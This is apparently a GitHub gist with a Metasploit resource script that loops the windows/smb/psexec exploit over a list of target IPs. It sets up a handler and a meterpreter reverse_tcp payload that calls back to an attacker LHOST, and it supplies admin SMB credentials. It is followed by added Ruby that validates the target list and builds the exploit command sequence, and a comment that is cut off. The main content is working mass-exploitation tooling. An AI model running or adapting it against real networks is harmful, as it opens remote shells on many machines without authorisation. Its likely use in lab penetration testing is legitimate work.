Gist kernelsmith/5110923, last active December 12, 2018 11:21
do some exploit repeatedly
```
# This is really a .rc file, but to get pretty colors, we're calling it a .rb file
#
# setup handler
#
use multi/handler
set LPORT 8080
set ExitOnSession false
exploit -j
#
# prep exploit
#
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set DisablePayloadHandler true
set LPORT 8080
set LHOST 192.168.1.1
set SMBUser administrator
set SMBPass lab
# set SMBDomain -- let's assume the Domains are different, we'll set them in our file
#
# read ip list then loop and run exploit on each
#
<ruby>
# readlines will read the file into an array w/default line sep as the delim
# (no mode argument here: a second argument to File.readlines is the line
# separator, not a file mode, so passing "r" would break line splitting)
# readlines will also automatically close the File handle, so nothing to cleanup later
line_array = File.readlines("/path/to/iplist.txt")
line_array.each do |line|
  # strip the trailing newline before splitting so neither the ip nor the
  # domain carries a "\n" into the set command; domain is nil when absent
  ip, domain = line.strip.split(',')
  run_single("set RHOST #{ip}")
  run_single("set SMBDomain #{domain}") if domain
  run_single("exploit -z")
  # in case the next iteration doesn't have a domain listed
  run_single("unset SMBDomain")
end
</ruby>
```
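The fragile part of the resource file above is the input handling: a blank line, a comment, or a typo in the list becomes a bogus `set RHOST`. The following Ruby is an added example, not code from the gist, that pulls the `<ruby>` block's loop out into two testable functions: `parse_iplist` applies the same `ip,domain` line format but skips blank and `#` lines and drops entries that are not valid addresses (checked with the standard library's `IPAddr`), and `build_commands` returns the command strings the loop would hand to `run_single`, so the sequence can be inspected before it is ever run inside msfconsole. `SAMPLE_IPLIST` is a constructed stand-in for `/path/to/iplist.txt`.

```ruby
require 'ipaddr'

# Constructed sample target list, standing in for /path/to/iplist.txt.
# Same format as the gist: one host per line with an optional ",DOMAIN" suffix.
SAMPLE_IPLIST = <<~LIST
  # lab hosts (comment lines and blank lines are skipped)
  192.168.1.10,LAB
  192.168.1.11

  192.168.1.12,CORP
  not-an-ip,LAB
LIST

# Parse the list into [ip, domain_or_nil] pairs.
# Blank lines, '#' comments and lines whose first field is not a valid
# IPv4/IPv6 address are skipped (with a warning on stderr) instead of being
# passed to the module as a malformed RHOST.
def parse_iplist(text)
  targets = []
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    ip, domain = line.split(',', 2).map { |field| field.strip }
    begin
      IPAddr.new(ip)
    rescue IPAddr::InvalidAddressError
      warn "skipping malformed address: #{ip.inspect}"
      next
    end
    domain = nil if domain.nil? || domain.empty?
    targets << [ip, domain]
  end
  targets
end

# Build the console commands the gist's loop issues, one batch per host.
# In the resource file each string would go to run_single; here they are
# returned so the sequence can be checked without a console session.
def build_commands(targets)
  cmds = []
  targets.each do |ip, domain|
    cmds << "set RHOST #{ip}"
    cmds << "set SMBDomain #{domain}" if domain
    cmds << "exploit -z"
    # clear the domain only when one was set, so it cannot leak into the
    # next host's run (the gist unsets unconditionally, which also works)
    cmds << "unset SMBDomain" if domain
  end
  cmds
end

if __FILE__ == $PROGRAM_NAME
  build_commands(parse_iplist(SAMPLE_IPLIST)).each { |cmd| puts cmd }
end
```

Run stand-alone it prints the ten commands for the three valid hosts and warns about the `not-an-ip` line; inside a resource file the `puts` would be replaced by `run_single(cmd)`.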
Comment by the gist author:
ausec, sorry I missed you on IRC. You can definitely replace the exploit w/an aux module, just add the appropriate settings and change run_single("exploit -z") to run_single("run -j") or whatever floats your boat. However, I believe this is entirely OBE cuz RHOSTS will take a file name now so just do: